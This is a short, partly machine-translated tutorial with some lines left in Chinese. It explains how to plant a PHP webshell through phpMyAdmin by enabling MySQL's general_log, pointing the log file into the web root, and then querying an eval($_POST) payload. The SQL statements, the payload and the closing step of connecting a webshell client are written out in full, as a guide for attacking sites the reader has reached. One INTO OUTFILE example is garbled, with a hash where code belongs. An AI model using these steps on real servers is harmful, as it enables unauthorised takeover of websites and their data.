The following column phpmyadmin usage tutorial will introduce you to phpmyadmin’s new posture getshell. I hope it will be helpful to friends in need!
Baidu Encyclopedia: phpMyAdmin is a MySQL based on PHP and structured in Web-Base mode on the website host A database management tool that allows administrators to manage MySQL databases using a web interface. This web interface can be a better way to input complex SQL syntax in a simple way, especially when it comes to importing and exporting large amounts of data. One of the greater advantages is that phpMyAdmin is executed on the web server like other PHP programs, but you can use the HTML pages generated by these programs anywhere, that is, to remotely manage the MySQL database, and easily create, modify, and delete Databases and data tables. You can also use phpMyAdmin to create commonly used PHP syntax to facilitate the correctness of SQL syntax required when writing web pages.
In layman's terms, its function is to conveniently operate the database on the web page.
When we get the phpmyadmin page of a site, the next thing to do is getshell.
You can escalate privileges by writing a shell, and we need to meet the following conditions:
1. Database root permissions
2. Know the physical path of the website
3. The database has write permissions
Write into the shell through select '64d8a9f9d2660d1aa18735456c689d78' INTO OUTFILE 'Website physical path'
This article mainly talks about the successful getshell when condition 3 is not met.
Utilization conditions: MySQL 5.0
The version of MySQL 5.0 will automatically create a log file, so the same is true for modifying global variables while the service is running. The file location can be changed, but you must have read and write permissions on the directory where the log is generated.
(It may be more demanding in the Linux environment, because the site directory is one user and MySQL is another user. Permission control is stricter, mainly depending on whether the permissions are properly configured)
First we test whether the site has write permission
Execute the sql statement SHOW VARIABLES LIKE 'secure_file_priv'
# SQL statement SHOW VARIABLES LIKE 'secure_file_priv' performs a query to find secure_file_privsecure-file-priv feature The secure-file-priv parameter is used to limit LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() Which specified directory to transfer to.
Then introduce two MySQL global variables (
general_log, general_log file)
Execute the sql statement SHOW VARIABLES LIKE 'general_log% ' Perform fuzzy query
The log is closed by default
We execute the sql statement
set global general_log = "ON"; #开启日志 SET global general_log_file='网站下物理路径'; #更换日志路径
Successfully created
然后执行特殊的查询语句
select '<?php eval($_POST[aaa]);?>'
我们进入112233.php进行验证,成功写入shell
最后进行菜刀连接,获得站点webshell
The above is the detailed content of About phpmyadmin new posture getshell. For more information, please follow other related articles on the PHP Chinese website!